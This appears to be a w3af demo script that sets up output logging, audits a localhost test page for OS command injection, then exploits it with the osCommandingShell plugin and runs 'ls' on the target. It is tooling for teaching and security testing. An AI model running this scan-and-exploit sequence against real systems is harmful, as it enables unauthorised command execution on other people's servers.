# This is the osCommanding demo: plugins output console,textFile output output config textFile set fileName output-w3af.txt set verbosity 10 back output config console set verbosity 0 back back plugins audit osCommanding audit back target set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9 back start exploit exploit osCommandingShell ls